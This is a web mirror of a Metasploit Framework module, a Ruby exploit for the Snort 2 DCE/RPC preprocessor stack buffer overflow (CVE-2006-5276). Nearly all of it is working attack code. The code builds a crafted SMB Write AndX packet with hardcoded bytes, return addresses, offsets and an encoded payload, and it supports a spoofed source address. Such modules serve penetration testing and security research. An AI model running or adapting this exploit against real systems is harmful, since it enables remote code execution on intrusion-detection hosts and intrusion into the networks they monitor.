Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/ids/snort_dce_rpc.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Capture

10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',

17
        'Description' => %q{

18
          This module allows remote attackers to execute arbitrary code by exploiting the

19
          Snort service via crafted SMB traffic. The vulnerability is due to a boundary

20
          error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,

21
          which may result a stack-based buffer overflow with a specially crafted packet

22
          sent on a network that is monitored by Snort.

23


24
          Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

25


26
          Any host on the Snort network may be used as the remote host. The remote host does not

27
          need to be running the SMB service for the exploit to be successful.

28
        },

29
        'Author' => [

30
          'Neel Mehta', # Original discovery (IBM X-Force)

31
          'Trirat Puttaraksa', # POC

32
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>', # Metasploit win

33
          '0a29406d9794e4f9b30b3c5d6702c708' # Metasploit linux

34
        ],

35
        'License' => MSF_LICENSE,

36
        'References' => [

37
          [ 'OSVDB', '32094' ],

38
          [ 'CVE', '2006-5276' ],

39
          [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],

40
          [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],

41
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']

42
        ],

43
        'DefaultOptions' => {

44
          'EXITFUNC' => 'thread',

45
        },

46
        'Payload' => {

47
          'Space' => 390,

48
          'BadChars' => "\x00",

49
          'DisableNops' => true,

50
        },

51
        'Platform' => %w{win linux},

52
        'Targets' => [

53
          [

54
            'Windows Universal',

55
            {

56
              'Platform' => 'win',

57
              'Ret' => 0x00407c01, # JMP ESP snort.exe

58
              'Offset' => 289, # The number of bytes before overwrite

59
              'Padding' => 0

60
            }

61
          ],

62
          [

63
            'Redhat 8',

64
            {

65
              'Platform' => 'linux',

66
              'Ret' => 0xbffff110,

67
              'Offset' => 317,

68
              'Padding' => 28

69
            }

70
          ]

71
        ],

72
        'Privileged' => true,

73
        'DisclosureDate' => '2007-02-19',

74
        'DefaultTarget' => 0,

75
        'Notes' => {

76
          'Reliability' => UNKNOWN_RELIABILITY,

77
          'Stability' => UNKNOWN_STABILITY,

78
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

79
        }

80
      )

81
    )

82


83
    register_options(

84
      [

85
        Opt::RPORT(139),

86
        OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),

87
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])

88
      ]

89
    )

90


91
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')

92
  end

93


94
  def exploit

95
    open_pcap

96


97
    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

98


99
    p = buildpacket(shost, rhost, rport.to_i)

100


101
    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")

102


103
    return unless capture_sendto(p, rhost)

104


105
    handler

106
  end

107


108
  def buildpacket(shost, rhost, rport)

109
    p = PacketFu::TCPPacket.new

110
    p.ip_saddr = shost

111
    p.ip_daddr = rhost

112
    p.tcp_dport = rport

113
    p.tcp_flags.psh = 1

114
    p.tcp_flags.ack = 1

115


116
    # SMB packet borrowed from https://www.exploit-db.com/exploits/3362

117


118
    # NetBIOS Session Service, value is the number of bytes in the TCP segment,

119
    # must be greater than the total size of the payload. Statically set.

120
    header = "\x00\x00\xde\xad"

121


122
    # SMB Header

123
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"

124
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"

125
    header << "\x00\x08\x30\x00"

126


127
    # Tree Connect AndX Request

128
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"

129
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"

130
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"

131
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

132


133
    # NT Create AndX Request

134
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"

135
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

136
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"

137
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"

138
    header << "\x63\x00\x00\x00"

139


140
    # Write AndX Request #1

141
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"

142
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"

143
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"

144
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"

145
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"

146
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"

147
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

148


149
    # Write AndX Request #2

150
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"

151
    header << "\x00\x48\x00\x00\x00\xff\x01"

152
    tail = "\x00\x00\x00\x00\x49\x00\xee"

153


154
    # Return address

155
    eip = [target['Ret']].pack('V')

156


157
    # Sploit

158
    sploit = make_nops(10)

159
    sploit << payload.encoded

160


161
    # Padding (to pass size check)

162
    sploit << make_nops(1)

163


164
    # The size to be included in Write AndX Request #2, including sploit payload

165
    requestsize = [(sploit.size() + target['Offset'])].pack('v')

166


167
    # Assemble the parts into one package

168
    p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit

169


170
    p.recalc

171


172
    p

173
  end

174
end

175


176